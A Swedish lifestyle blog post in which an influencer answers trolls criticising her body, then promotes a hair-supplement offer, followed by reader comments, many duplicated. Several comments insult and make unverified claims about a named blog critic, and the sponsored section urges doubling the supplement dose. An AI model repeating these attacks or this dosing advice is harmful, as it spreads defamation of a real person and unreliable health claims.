Mys Blommor / Din florist / Interflora 🌹 / Högsta Kvalitet & Design💫 🌍 Catalina Torget 15 Täby 📲 08 36 36 14

Mys Blommor🌹/ Din florist / Högsta Kvalitet & Design💫 / 🌍 Catalina Torget 15 Täby 📲 08 36 36 14

@mymartens

@mys_blommor

Strong Mamas

När nättrollen går bananas! Och en alla hjärtansdagpresent!

❣️I samarbete med Bobbys Superhair ❣️ 

3D804269-F37A-44DD-B79A-008468C6E630

Först och främst……. På riktigt?! Vad händer i kommentarsfältet? Vad är det för elakheter som skrivs? 🙈

Mina ”vanliga” stackars följare tvingas gå i försvar och stämningen är allt annat än trevlig. Så är det Varje gång Bloggbevakningen skriver någonting, då kommer dom… dom där nitiska, dömmande och elaka kommentarerna.

Det hon skriver om har jag redan bemött, flera gånget u mitt kommentarsfält. Hela inlägget togs ner för att det var en enormt hatstorm! Det hon påstår gällande bilder är inte NÄR bilden är tagen, utan när den är publicerad som däremot stämmer. En bild på min kaffekopp och hand när jag kör bil tagen av min vän kan väl för bövelen inte vara tillräckligt ont uppsåt för att attackerad såhär?! 🤦🏼‍♀️ End of diskussion, PUNKT! 

Därifrån till att det Nu är det till och med fel på min röv! 🍑🤣 (bakdel, rumpa, ja du fattar)

Min bak är för stor för klänningen, min rumpa passar inte mina kläder enligt trollen….. Min selfie pose är hemsk och jag är vidrig! Klänningarna smaklösa. Gud vet allt! 🙈

-Koooom igen nu! Vad är det för nivå? Hur mår dom här trollen egentligen? Bra?

-Trivs dom med sig själva tror ni? 🤔

Ni som följer mig sedan länge vet att dom flesta grova elakheterna som skrivs INTE publiceras. Det är inget nytt. Detta är för ERAN skull, och för att stämningen ska var bra☺️ Dessa kan alltså bara jag och admin se.

Men några rackare slinker igenom…… och håll nu isär åsikter och nättroll. Det är INTE det jag diskuterar nu!

Innan jag började träning för många år sedan, så var min rumpa🍑  betydligt plattare än nu.

Då var DET fel 🙈 Nu när jag tränar ganska mycket ben och rumpa så är det också fel……

Hur man än gör så kommer det alltid finnas vissa som går i gång på att leta fel, och det spelar ingen roll HUR man gör. Man kan aldrig bli omtyckt av all ändå. Här inne är det ca 95% underbara, genuina följare, och ca 5% skräp. För att minimera dom där 5% så tar vi bort dessa kommentarer….. 

Detta är ETT typexempel på hur elaka framförallt kvinnor kan vara mot varandra! Leta fel, trycka ner och förminska!

-Varför? Till vilken nytta?

Det borde vara tvärt om! Säg något snällt, lyft fram, sprid lite pepp och glädje istället för tvärt om!

Jag har former, rumpa, höfter, midja, bröst och allt som hör min 31 åriga mammakropp till! Jag duger precis som jag är! Och det gör du också! ❤️

Perfekt? Vad och vem är perfekt? Man är den man är, och jag strävar alltid efter att bli den bästa versionen av mig själv…. inifrån och ut. Där ingår inte ordet ”perfekt”!

Så ta detta exempel på dumhet och påmin dig om att ingen får trycka ner dig! Jag älskar mig själv för den jag är, och mina former får gärna synas i en klänning som denna! ✌🏻

Nog om detta!

Nu ska ni få en alla-hjältarns-dag present för er som vill ❤️ En kampanj på världens bästa hårnäring, enligt mig 😍

B51132B9-D364-4E02-8220-AADED7FEAED4

Nu är det snart Alla hjärtans dag ❣️Det firar vi med att köra ett jätte bra erbjudande på Superhair! 😍

Ni vet att jag älskar dom! Enligt mig som testat allt och lite till så tycker jag att dom är helt överlägsna på marknaden🙌🏻  Den ultimata hårnäringen som gör skillnad!

Plus att den är bra för hud och naglar 💅🏻

-Trevlig bonus! 

DBF2B3BB-680F-436B-9A56-BDFA36528486

För bästa resultat så bör du äta minst sex månader!!! Men du märker redan resultat och börjar känna skillnad efter ca 10-12 veckor. För att kickstarta brukar jag äta dubbel dos först veckorna. (Det gör jag då och då ) -Det rekommenderar jag dig också….  

Slarva inte med dina vitaminpiller , du måste äta dom varje dag! 😊

ibland säger en bild mer än tusen ord…  före/efter 

CE8828F1-C7E7-4444-9431-DC14C32A113F

En burk Superhair kostar ord 399:-/st (60 kapslar)  

Nu får du köpa TVÅ burkar för 549:- 😍🙌🏻 

Endast denna kampanj, så passa på NU 😊

05E9F135-EE30-413C-8F8F-EB39B662D56C 5FAD1902-5812-4A3A-9EA2-08632E9DB9B4

Ingen kod behövs, du hittar erbjudandet HÄR 👈🏻

kram kram❤️

/My Martens 

 

133 Komentarer

 1. My du är jättefin och ser otroligt sund och naturlig ut! Alla dessa människor som skriver och klagar på dig är bara avundsjuka! Fortsätt att vara som du är!!
  Kram kram

 2. Finns bara en sak att göra om man inte vill läsa My’s blogg sluta ,väldigt enkelt. Varför ska man bara hitta fel på allt. Om man inte tycker om en blogg sluta bara och läs och hitta en annan. Jag som är en gammal tant fattar inte att folk har totalt tappat respekt för andra människor. Ja älskar My’s blogg och kommer att fortsätta läsa,tycker du verkar vara en fin människa My❤

  • Håller helt med! Jag kommer aldrig att fatta varför man följer en blogg som man inte gillar??! Vad är syftet? Är det:
   A. Man får utlopp för egna inneboende aggressioner när man är elak mot nån annan?
   B. Man har utsett sig till moralens väktare och tycker sig ha rätt att mästra blogginnehavaren så fort den viker en cent ifrån den rätta vägen?
   C. Man kör nån sorts missunsam kampanj mot bloggaren och försöker med alla medel omvända bloggarens följare?
   Vad det än är så funkar det inte. Kommer fortsätta läsa Mys blogg för att den är underhållande och mänsklig. Sen att man skrattar ihjäl sig åt vissa negativa kommentarer höjer bara bloggens värde. Heja dig My! Var stolt över dig själv! Kram!

 3. My du är jättefin och ser otroligt sund och naturlig ut! Alla dessa människor som skriver och klagar på dig är bara avundsjuka! Fortsätt att vara som du är!!
  Kram kram

 4. Finns bara en sak att göra om man inte vill läsa My’s blogg sluta ,väldigt enkelt. Varför ska man bara hitta fel på allt. Om man inte tycker om en blogg sluta bara och läs och hitta en annan. Jag som är en gammal tant fattar inte att folk har totalt tappat respekt för andra människor. Ja älskar My’s blogg och kommer att fortsätta läsa,tycker du verkar vara en fin människa My❤

  • Håller helt med! Jag kommer aldrig att fatta varför man följer en blogg som man inte gillar??! Vad är syftet? Är det:
   A. Man får utlopp för egna inneboende aggressioner när man är elak mot nån annan?
   B. Man har utsett sig till moralens väktare och tycker sig ha rätt att mästra blogginnehavaren så fort den viker en cent ifrån den rätta vägen?
   C. Man kör nån sorts missunsam kampanj mot bloggaren och försöker med alla medel omvända bloggarens följare?
   Vad det än är så funkar det inte. Kommer fortsätta läsa Mys blogg för att den är underhållande och mänsklig. Sen att man skrattar ihjäl sig åt vissa negativa kommentarer höjer bara bloggens värde. Heja dig My! Var stolt över dig själv! Kram!

 5. Hatstorm? Massa fel på din rumpa och klänningen osv… ?
  EN person skrev att hen inte tyckte klänningen passade din runda rumpa.
  Rund är ett beskrivande ord, hen tycker din rumpa är rund. Hen skriver inte att det är nåt fult eller negativt att ha en rund rumpa. Hen skriver heller inte att klänningen är ful eller osmaklig. Det enda hen tyckte, och tydligen tyckte var viktigt att framföra, var att klänningen inte passar din rumpa.
  Men det tycker jag det gör, som jag skrev under det inlägget.
  En bikinikropp är väl en kropp i bikini, eller hur?
  Är det så att du har fått fler kommentarer med fula ord om din rumpa och klänningar som du raderat, men ändå hänvisar till när du skriver att du fått en hatstorm? Ja, då blir det ju lite konstigt i våra ögon för vi ser ju inte stormen, antalet dumma kommentarer.
  Men just nu vet jag inte om jag ser nån storm direkt.
  Alla kommentarer under inlägget med bilkörningen var ju inte kul så klart. Men det sätt du bemötte det på gjorde ju att du framstod som skyldig. Snabbare förklaring där hade ju varit smart. Den första bilden hade du ju lagt ut flera dagar tidigare också, så den kan ju mycket väl vara fotad av en passagerare. Vi vet väl inte alla bilturer du gör? Och vilka som åker med? Och bilden med koppen var ju också fotad vid ett annat tillfälle säger du. Men när du kapar i bilden och skrev att du stannat och gympade lät det som du stannat och tagit bilderna då. Men du menade väl att du SKRIVIT inlägget då. Och folk fortsatte spinna vidare o tolka lite hit o dit.

 6. Så sant elakheter??? nej absolut inte åsikter och frågor ja men kommentarer blir ju fler av i alla fall rätt lugnt annars 😉.

 7. Vilket trams o dumma kommentarer.
  Jag älskar dig My precis som du är med alla fel o brister o kommer fortsätta att läsa din blogg, oavsett om du kör med kaffekopp eller ej.
  Är också en tant som har lärt mig att ödmjukhet är det enklaste o bästa. ?

 8. Hatstorm? Massa fel på din rumpa och klänningen osv… ?
  EN person skrev att hen inte tyckte klänningen passade din runda rumpa.
  Rund är ett beskrivande ord, hen tycker din rumpa är rund. Hen skriver inte att det är nåt fult eller negativt att ha en rund rumpa. Hen skriver heller inte att klänningen är ful eller osmaklig. Det enda hen tyckte, och tydligen tyckte var viktigt att framföra, var att klänningen inte passar din rumpa.
  Men det tycker jag det gör, som jag skrev under det inlägget.
  En bikinikropp är väl en kropp i bikini, eller hur?
  Är det så att du har fått fler kommentarer med fula ord om din rumpa och klänningar som du raderat, men ändå hänvisar till när du skriver att du fått en hatstorm? Ja, då blir det ju lite konstigt i våra ögon för vi ser ju inte stormen, antalet dumma kommentarer.
  Men just nu vet jag inte om jag ser nån storm direkt.
  Alla kommentarer under inlägget med bilkörningen var ju inte kul så klart. Men det sätt du bemötte det på gjorde ju att du framstod som skyldig. Snabbare förklaring där hade ju varit smart. Den första bilden hade du ju lagt ut flera dagar tidigare också, så den kan ju mycket väl vara fotad av en passagerare. Vi vet väl inte alla bilturer du gör? Och vilka som åker med? Och bilden med koppen var ju också fotad vid ett annat tillfälle säger du. Men när du kapar i bilden och skrev att du stannat och gympade lät det som du stannat och tagit bilderna då. Men du menade väl att du SKRIVIT inlägget då. Och folk fortsatte spinna vidare o tolka lite hit o dit.

 9. Vilket trams o dumma kommentarer.
  Jag älskar dig My precis som du är med alla fel o brister o kommer fortsätta att läsa din blogg, oavsett om du kör med kaffekopp eller ej.
  Är också en tant som har lärt mig att ödmjukhet är det enklaste o bästa. 😊

 10. Du är jättefin My! ❤️
  Du behöver verkligen inte bry dig om kommentarer om din kropp!
  Däremot kanske universum försöka säga dig något om bilkörning. Du vet blessings in disguise.
  Det är inte bra att greja och dona med olika saker när man kör bil. Man kan lätt bli lite ”nonchig” som min pappa brukar säga till mig när man kör bil ofta och mycket. Man tror att man klarar av mer än man gör om det skulle hända något i trafiken. Det beror ju inte bara hur man själv kör, utan det kan helt plötsligt dyka upp ett djur eller någon som vinglar till osv när man är ute och kör på vägarna. När man kör så kör man bil och inget annat.
  Har en kompis som sa, men vad ska man annars göra när man kör långt än att ha möten och jobba mm i bilen?
  Man ska köra bil och det räcker! Den mänskliga hjärnan är inte gjord för att göra flera saker samtidigt. När man pratar med någon i mobilen så får man bilder i hjärnan av den personen mm och det har visat sig att man då stänger av synen åt sidorna och bara ser rakt fram..
  Vill ditt bästa!
  Kram
  ❤️
  Ps. Bobby´s Superhair är superbra tycker jag!

 11. Du är jättefin My! ❤️
  Du behöver verkligen inte bry dig om kommentarer om din kropp!
  Däremot kanske universum försöka säga dig något om bilkörning. Du vet blessings in disguise.
  Det är inte bra att greja och dona med olika saker när man kör bil. Man kan lätt bli lite ”nonchig” som min pappa brukar säga till mig när man kör bil ofta och mycket. Man tror att man klarar av mer än man gör om det skulle hända något i trafiken. Det beror ju inte bara hur man själv kör, utan det kan helt plötsligt dyka upp ett djur eller någon som vinglar till osv när man är ute och kör på vägarna. När man kör så kör man bil och inget annat.
  Har en kompis som sa, men vad ska man annars göra när man kör långt än att ha möten och jobba mm i bilen?
  Man ska köra bil och det räcker! Den mänskliga hjärnan är inte gjord för att göra flera saker samtidigt. När man pratar med någon i mobilen så får man bilder i hjärnan av den personen mm och det har visat sig att man då stänger av synen åt sidorna och bara ser rakt fram..
  Vill ditt bästa!
  Kram
  ❤️

  Ps. Bobby´s Superhair är superbra tycker jag!

 12. Ser en som har kommenterat din kropp vilket är väldigt onödigt men många är det väl ändå inte? Dina kommentarer syns ju på en gång så hur kan så många bli borttagna pga elakheter som ingen av oss ser det är jag intresserad av att förstå.

  • För att ta bort det som är FÖR grovt, eller rent av obehagligt! Men också för övriga läsares skull….
   Jag skrivit långt inlägg om detta tidigare, läs gärna ☺️

   • Tack för svar men var hittar jag det svårt att söka. Eftersom kommentarsfältet är öppet så fattar jag inte hur du kan ta bort något innan det syns här inne att det tas bort efter att ha stått är en sak förklara gärna.

    • Vi har blockerat vissa ord och namn. Kommentarsfältet är filtrerat ? det tekniska är jag inte så duktig på själv.. men jag uppskattar funktionen??

 13. Jag har alltid haft en platt och ful ända, nu har jag blivit lite kraftigare och då fått en bred ful rumpa. HAHA Aldrig blir jag nöjd. Men trots allt, livet gåt vidare ändå.
  Trevlig helg My

 14. Du har skrivit om att du läst till Pt och sedan jobbat som det. Varför slutade du? Du började att läsa till mäklare, varför slutade du med det? Du började med en Podd vad hände.med den? Du säger att du är VD, hur många procent jobbar du som det? Har du andra jobb också? Eftersom du jobbar utöver bloggen så utgår jag från att du inte kan livnära dig på enbart din blogg.

  • Jag har svarat dig tidigare på detta ? men gör ett nytt försök igen ☺️
   Jag tjänar inte tillräckligt för att bara försörja mig som pt. Bloggen har varit min huvudsyssla senaste åren, även när jag jobbade deltid som personlig tränare.
   jag tog en pt-tjänst på ett halvår, innan andra projekt skulle behöva min tid. Det visste jag, och mina kunder. (Skrev dock aldrig det till dig)
   Jag ville omvandla min hobby till ett yrke, då jag jobbat med bootcamp och träningssresor långt innan.
   Älskar att coacha andra. Det är det roligaste jag vet ☺️
   Pga av flytten till öland och pendlingen det medförde så satte jag det på paus efter min tjänst. Svårt med kontinuitet när man pendlar mellan två städer. Då får inte mina kunder det jag vill ge dom…. ☺️
   Men också för att prioritera mitt då, nya förhållande ☺️ För att hinna med min Jonas, Lilleman, bloggen och min tjänst som jag så småningom fick som VD.
   Vd tjänsten är på 100%, jag stormtrivs ?
   bloggen omsatte förra årets strax under 1 milj, (se alla bolag) så för mig är det en väldigt viktig inkomstkälla.
   Den ”räddade” mig efter konkursen och har gjort att jag kan betala av mina skulder sedan den.. Nu, snart 3 år efter så ser jag ljuset i tunneln, och är snart skuldfri ☺️
   Egentligen behöver jag inte fler jobb än bloggen. Men jag ville betala av skulderna så fort som möjligt. Jag saknar gemenskapen och kollegor. Behöver stimuleras med jobb utöver bloggen…. Därför tackade jag Ja till Lifestyle jobbet då det går hand i hand med det jag redan gör i bloggen ?
   Mäklarutbildningen var tuff. För tuff.
   När jag blev sjukskriven och inte mådde bra så satte jag den på paus. När Jag sedan blev headhuntad till Lifestyle så känner jag att det passade mig bättre…. Lugnare arbetstider, inte samma stress som man har på sig som Mäklare då lönen är provisionsbaserad och man alltid jobbar alla helger.
   Efter nogran övervägning hemma där jag och Jonas diskuterade för och nackdelar så kom jag fram till att detta passar min lite ovanliga livsstil bättre ☺️
   Med tanke på Ludvig, Jonas jobb, pendlingen och framtidsplanerna på eventuella syskon osv.
   Jag måste alltid vara lyhörd efter min utmattningsdepression, och med facit i hand så är inte mäklaryrket någonting som passar min hälsa…
   PTn inom mig har varit understimulerad. Men nu, i förrgår släpptes första träningsresa av många ☺️ (Se inlägg) Så jag kommer att ha bootcamp, och träningssresor under 2019/2020, där ett av våra magasin på lifestyle följer med. Några av länderna är Egypten, Thailand, Gran Canaria, m.f.
   Bloggen säljer in, och du som genuin, trogen bloggläsare får möjlighet att följa med ?? tre jobb i ett ?
   Podden med Sabina! Som vi saknar den! Men den ligger kvar, det är bara det att MTG (i like radio) som håller i den, inte lyckats sälja in någon ny sponsor. Så tills dom har en ny… så för vi avvakta ?
   -Saknar du sen? ☺️ Missade jag att svara på något nu? Tror inte det ?? hoppad att du fick alla svar som du sökt, om och om igen ? Med vänlig hälsning, My

   • Du var ju så enormt stöddig när du började mäklarutbildningen. Du hade minsann kunskaper genom ditt blomsterföretag och du skulle passa som en förtroendegivande seriös mäklare.

    • Och my svarade dig ödmjukt att kursen var tuff, alldeles för tuff. Hon säger dig Detta utan att linda in nåt i stil med att hon inte hade tid eller nåt. Du gasar på om att hon var ”stöddig”. Det är väl jätteroligt att ha ambitioner om nåt, man går ju knappast in i ett projekt med svansen mellan bena precis. Du kallar de ”stöddigt”? Vem är du eg som håller på o tjatar om detta hela tiden? Har du nåt fel med minnet eller nåt? Du börjar bli läskig…

   • Hittar inte inlägget om din träningsresa från i förrgår eller så är det bara jag som inte kan se. Vilka typer av pass ska du hålla i, men det kanske står i annonsen när jag har fått syn på den spännande ?.

 15. Herregud My. Bry dig inte om alla avundsjuka kvinnor. Jag hade varit i sjunde himmelen om jag haft din kropp. Så fin!!
  Bry dig bara om vad du själv tycker och vad Jonas tycker. Enligt mig så är du fullkomlig.

 16. Ser en som har kommenterat din kropp vilket är väldigt onödigt men många är det väl ändå inte? Dina kommentarer syns ju på en gång så hur kan så många bli borttagna pga elakheter som ingen av oss ser det är jag intresserad av att förstå.

  • För att ta bort det som är FÖR grovt, eller rent av obehagligt! Men också för övriga läsares skull….

   Jag skrivit långt inlägg om detta tidigare, läs gärna ☺️

   • Tack för svar men var hittar jag det svårt att söka. Eftersom kommentarsfältet är öppet så fattar jag inte hur du kan ta bort något innan det syns här inne att det tas bort efter att ha stått är en sak förklara gärna.

    • Vi har blockerat vissa ord och namn. Kommentarsfältet är filtrerat 🙂 det tekniska är jag inte så duktig på själv.. men jag uppskattar funktionen🙏🏻

 17. Jag har alltid haft en platt och ful ända, nu har jag blivit lite kraftigare och då fått en bred ful rumpa. HAHA Aldrig blir jag nöjd. Men trots allt, livet gåt vidare ändå.
  Trevlig helg My

 18. Du har skrivit om att du läst till Pt och sedan jobbat som det. Varför slutade du? Du började att läsa till mäklare, varför slutade du med det? Du började med en Podd vad hände.med den? Du säger att du är VD, hur många procent jobbar du som det? Har du andra jobb också? Eftersom du jobbar utöver bloggen så utgår jag från att du inte kan livnära dig på enbart din blogg.

  • Jag har svarat dig tidigare på detta 🙂 men gör ett nytt försök igen ☺️

   Jag tjänar inte tillräckligt för att bara försörja mig som pt. Bloggen har varit min huvudsyssla senaste åren, även när jag jobbade deltid som personlig tränare.
   jag tog en pt-tjänst på ett halvår, innan andra projekt skulle behöva min tid. Det visste jag, och mina kunder. (Skrev dock aldrig det till dig)

   Jag ville omvandla min hobby till ett yrke, då jag jobbat med bootcamp och träningssresor långt innan.

   Älskar att coacha andra. Det är det roligaste jag vet ☺️

   Pga av flytten till öland och pendlingen det medförde så satte jag det på paus efter min tjänst. Svårt med kontinuitet när man pendlar mellan två städer. Då får inte mina kunder det jag vill ge dom…. ☺️

   Men också för att prioritera mitt då, nya förhållande ☺️ För att hinna med min Jonas, Lilleman, bloggen och min tjänst som jag så småningom fick som VD.

   Vd tjänsten är på 100%, jag stormtrivs 😄

   bloggen omsatte förra årets strax under 1 milj, (se alla bolag) så för mig är det en väldigt viktig inkomstkälla.

   Den ”räddade” mig efter konkursen och har gjort att jag kan betala av mina skulder sedan den.. Nu, snart 3 år efter så ser jag ljuset i tunneln, och är snart skuldfri ☺️

   Egentligen behöver jag inte fler jobb än bloggen. Men jag ville betala av skulderna så fort som möjligt. Jag saknar gemenskapen och kollegor. Behöver stimuleras med jobb utöver bloggen…. Därför tackade jag Ja till Lifestyle jobbet då det går hand i hand med det jag redan gör i bloggen 😊

   Mäklarutbildningen var tuff. För tuff.

   När jag blev sjukskriven och inte mådde bra så satte jag den på paus. När Jag sedan blev headhuntad till Lifestyle så känner jag att det passade mig bättre…. Lugnare arbetstider, inte samma stress som man har på sig som Mäklare då lönen är provisionsbaserad och man alltid jobbar alla helger.

   Efter nogran övervägning hemma där jag och Jonas diskuterade för och nackdelar så kom jag fram till att detta passar min lite ovanliga livsstil bättre ☺️

   Med tanke på Ludvig, Jonas jobb, pendlingen och framtidsplanerna på eventuella syskon osv.

   Jag måste alltid vara lyhörd efter min utmattningsdepression, och med facit i hand så är inte mäklaryrket någonting som passar min hälsa…

   PTn inom mig har varit understimulerad. Men nu, i förrgår släpptes första träningsresa av många ☺️ (Se inlägg) Så jag kommer att ha bootcamp, och träningssresor under 2019/2020, där ett av våra magasin på lifestyle följer med. Några av länderna är Egypten, Thailand, Gran Canaria, m.f.

   Bloggen säljer in, och du som genuin, trogen bloggläsare får möjlighet att följa med 😄😉 tre jobb i ett 😉

   Podden med Sabina! Som vi saknar den! Men den ligger kvar, det är bara det att MTG (i like radio) som håller i den, inte lyckats sälja in någon ny sponsor. Så tills dom har en ny… så för vi avvakta 😄

   -Saknar du sen? ☺️ Missade jag att svara på något nu? Tror inte det 😅🙈 hoppad att du fick alla svar som du sökt, om och om igen 😌 Med vänlig hälsning, My

   • Du var ju så enormt stöddig när du började mäklarutbildningen. Du hade minsann kunskaper genom ditt blomsterföretag och du skulle passa som en förtroendegivande seriös mäklare.

    • Och my svarade dig ödmjukt att kursen var tuff, alldeles för tuff. Hon säger dig Detta utan att linda in nåt i stil med att hon inte hade tid eller nåt. Du gasar på om att hon var ”stöddig”. Det är väl jätteroligt att ha ambitioner om nåt, man går ju knappast in i ett projekt med svansen mellan bena precis. Du kallar de ”stöddigt”? Vem är du eg som håller på o tjatar om detta hela tiden? Har du nåt fel med minnet eller nåt? Du börjar bli läskig…

   • Hittar inte inlägget om din träningsresa från i förrgår eller så är det bara jag som inte kan se. Vilka typer av pass ska du hålla i, men det kanske står i annonsen när jag har fått syn på den spännande :).

 19. Herregud My. Bry dig inte om alla avundsjuka kvinnor. Jag hade varit i sjunde himmelen om jag haft din kropp. Så fin!!
  Bry dig bara om vad du själv tycker och vad Jonas tycker. Enligt mig så är du fullkomlig.

 20. Usch vilka kommentarer det finns här ibland.
  Nog om dom som håller på med det.
  Det jag ville skriva var.
  Du ska vara stolt över din kropp. En väldigt vacker figur.
  Så en trevlig helg.
  Kram L

 21. Usch vilka kommentarer det finns här ibland.
  Nog om dom som håller på med det.

  Det jag ville skriva var.
  Du ska vara stolt över din kropp. En väldigt vacker figur.
  Så en trevlig helg.
  Kram L

 22. Hej vännen min funderar på vad det är för underliga människor som kan slänga ur sig sådana elakheter men skit i dom för du är bäst.för avundsjuka kärringar slipper du inte de måste bara klaga för de lider av brist på empati så det så .superkramar ???????

 23. Hej vännen min funderar på vad det är för underliga människor som kan slänga ur sig sådana elakheter men skit i dom för du är bäst.för avundsjuka kärringar slipper du inte de måste bara klaga för de lider av brist på empati så det så .superkramar 🤗💕💕💕🐾🐾🐶

 24. Anonym@ Nej vi läsare av bloggen är inte och blir inte trötta på den. Det är dom anonyma, fega kräks inlägg som är tröttande där avundsjukan lyser genom raderna. Följ dom du tycker om, varför ens bryr du dig att följa bloggare där du tydligen måste söt ut din gälla för att må bra själv. Gör om och gör rätt!

  • Fast jag har nog tröttnat lite på att det alltid ska innehålla avundsjuka. Det behöver verkligen inte vara av avundsjuka folk skriver tokerier. Dom kan helt enkelt bara vara tokiga. Behöver inte vara värre än så.

 25. Anonym@ Nej vi läsare av bloggen är inte och blir inte trötta på den. Det är dom anonyma, fega kräks inlägg som är tröttande där avundsjukan lyser genom raderna. Följ dom du tycker om, varför ens bryr du dig att följa bloggare där du tydligen måste söt ut din gälla för att må bra själv. Gör om och gör rätt!

  • Fast jag har nog tröttnat lite på att det alltid ska innehålla avundsjuka. Det behöver verkligen inte vara av avundsjuka folk skriver tokerier. Dom kan helt enkelt bara vara tokiga. Behöver inte vara värre än så.

 26. Bara för att det står ”Stina”, ”Lena” eller annat kvinnligt namn, betyder det inte att det verkligen är kvinnor som skriver kommentarerna. Om folk bara visste hur många manliga trollfabriker det finns på nätet…. Män som utger sig för att vara kvinnor – det sker i varenda kommentarsfält och särskilt i BB som invaderats av Flashback.
  Camilla Gervide var redan under skoltiden i Småland en mobbare som hade svårt att få samkönade vänner eftersom hon är så elak och falsk som person. Det var väldigt tydligt redan då, att hon inte är riktigt frisk i huvudet. Ursäkta hårda ord men det är sant.

  • … och vill tillägga att mobbaren Camilla Gervide falskt påstår att det var HON själv som blev mobbad under skoltiden. Dagens samhälle: Offer görs till förövare och förövarna gör sig till offer. Sanningen är att få tjejer orkade umgås med henne eftersom hon är en sån jävla elak, avundsjuk och missunnsam skitsnackare och skvallerkärring. Än idag, som synes. En medelålders kärring som aldrig kommer till insikt. Skrämmande.

   • Fräscht att reagera på ett inlägg om ”nättroll” genom att sprida lite härliga rykten under anonym signatur. Så jäkla osmaklig kommentar och symptomatiskt att My som ofta pekar ut sig själv som offer, och klagar på andras kommentarsfält, inte rensar bort den här typen av kommentarer i sitt eget.

 27. Bara för att det står ”Stina”, ”Lena” eller annat kvinnligt namn, betyder det inte att det verkligen är kvinnor som skriver kommentarerna. Om folk bara visste hur många manliga trollfabriker det finns på nätet…. Män som utger sig för att vara kvinnor – det sker i varenda kommentarsfält och särskilt i BB som invaderats av Flashback.

  Camilla Gervide var redan under skoltiden i Småland en mobbare som hade svårt att få samkönade vänner eftersom hon är så elak och falsk som person. Det var väldigt tydligt redan då, att hon inte är riktigt frisk i huvudet. Ursäkta hårda ord men det är sant.

  • … och vill tillägga att mobbaren Camilla Gervide falskt påstår att det var HON själv som blev mobbad under skoltiden. Dagens samhälle: Offer görs till förövare och förövarna gör sig till offer. Sanningen är att få tjejer orkade umgås med henne eftersom hon är en sån jävla elak, avundsjuk och missunnsam skitsnackare och skvallerkärring. Än idag, som synes. En medelålders kärring som aldrig kommer till insikt. Skrämmande.

   • Fräscht att reagera på ett inlägg om ”nättroll” genom att sprida lite härliga rykten under anonym signatur. Så jäkla osmaklig kommentar och symptomatiskt att My som ofta pekar ut sig själv som offer, och klagar på andras kommentarsfält, inte rensar bort den här typen av kommentarer i sitt eget.

 28. Tack snälla My för ett mkt fint och trevligt inlägg. Det är som du säger viktigt att man hittar jobb och aktiviteter som passar in på sitt liv med barn och make och sig själv. Det viktigaste är ju ändå hälsan och att man mår bra.
  Vet inte riktigt vad din blogg är tänkt att handla om? men det är roligare och trevligare tycker jag när du skriver om din vardag. Dina inlägg om evenemang och fester blir inte så givande för mig i alla fall då de inte inger något personligt.

  • Hmmm, Ann, är du ny i bloggvärlden?
   För att förklara så är det så att bloggaren skriver om sitt liv.
   Vissa skriver mycket om mat, andra om inredning, eller hundar.
   My skriver om sitt liv, och det innehåller träning.
   Om det roar dig, stanna och läs.
   Om det är ointressant för dig, sök efter en annan blogg som är mer i din smak.
   Enkelt eller hur?

 29. Tack snälla My för ett mkt fint och trevligt inlägg. Det är som du säger viktigt att man hittar jobb och aktiviteter som passar in på sitt liv med barn och make och sig själv. Det viktigaste är ju ändå hälsan och att man mår bra.

  Vet inte riktigt vad din blogg är tänkt att handla om🙂 men det är roligare och trevligare tycker jag när du skriver om din vardag. Dina inlägg om evenemang och fester blir inte så givande för mig i alla fall då de inte inger något personligt.

  • Hmmm, Ann, är du ny i bloggvärlden?
   För att förklara så är det så att bloggaren skriver om sitt liv.
   Vissa skriver mycket om mat, andra om inredning, eller hundar.
   My skriver om sitt liv, och det innehåller träning.
   Om det roar dig, stanna och läs.
   Om det är ointressant för dig, sök efter en annan blogg som är mer i din smak.
   Enkelt eller hur?

 30. Tian. ORKA!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  Ni är faan för mycket. Hur är ni navlade???
  Era stackars föräldrar skulle skämma livet ur sig om dom visste hur ni bar er åt. Dom som inte gör det har väl fostrat er så.
  Till er andra jävla bitterf…… Är ni så vackra, så sexiga, så fruktansvärt omsvärmade?Har så snyggt passande kläder, så vansinngt vackert svall mm. mm. mm VAKNADE NI SEN??????????

 31. Tian. ORKA!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  Ni är faan för mycket. Hur är ni navlade???
  Era stackars föräldrar skulle skämma livet ur sig om dom visste hur ni bar er åt. Dom som inte gör det har väl fostrat er så.

  Till er andra jävla bitterf…… Är ni så vackra, så sexiga, så fruktansvärt omsvärmade?Har så snyggt passande kläder, så vansinngt vackert svall mm. mm. mm VAKNADE NI SEN??????????

 32. Bloggenbevakning och Camilla som driver den är så vidriga. Skriver så mycket elakheter och underblåser hat och lockar till sig nättroll ur de djupaste gömmorna. Hon driver ju en fruktansvärd hatkampanj mot Isabella Löwengrip som för länge sedan helt spårat ur. Camilla är helt besatt av henne. Jag hoppas så innerligt att Isabella snart stämmer henne för förtal.

 33. Bloggenbevakning och Camilla som driver den är så vidriga. Skriver så mycket elakheter och underblåser hat och lockar till sig nättroll ur de djupaste gömmorna. Hon driver ju en fruktansvärd hatkampanj mot Isabella Löwengrip som för länge sedan helt spårat ur. Camilla är helt besatt av henne. Jag hoppas så innerligt att Isabella snart stämmer henne för förtal.

 34. Jag tror att du har svårt att förstå vad som skrivs, Anonym 12.54… Du vet inte vilka kommentarer som kommit till My, för dom har inte lagts ut. Förstår du?

 35. Jag tror att du har svårt att förstå vad som skrivs, Anonym 12.54… Du vet inte vilka kommentarer som kommit till My, för dom har inte lagts ut. Förstår du?

 36. Tack för en bra blogg.
  Folk kommer alltid ha åsikter om allt,men när det kommer till personangrepp,så vågar folk inte ta det öga mot öga,utan man gömmer sig barkom sina skärmar mm. Är lagom trött på folk som först ger en sådan fin moralpredikan,för att i nästa stund,göra exakt likadant mot någon annan??
  Vad beror allt detta på?
  •Dåligt mående?
  •Avundsjuka?
  •Brist på uppmärksamhet?
  •Har inget annat för sig?
  Antagligen en dålig kombo utav alla dessa funderingar?Så tragiskt & trist. Visst ska man lära sig att ”låta det rinna av en” men man kan inte tåla vad för skit som helst.
  Det är ju inte konstigt att våra barn & ungdomar tar efter ett dåligt beteende.

 37. Tack för en bra blogg.

  Folk kommer alltid ha åsikter om allt,men när det kommer till personangrepp,så vågar folk inte ta det öga mot öga,utan man gömmer sig barkom sina skärmar mm. Är lagom trött på folk som först ger en sådan fin moralpredikan,för att i nästa stund,göra exakt likadant mot någon annan😳🙄

  Vad beror allt detta på?
  •Dåligt mående?
  •Avundsjuka?
  •Brist på uppmärksamhet?
  •Har inget annat för sig?

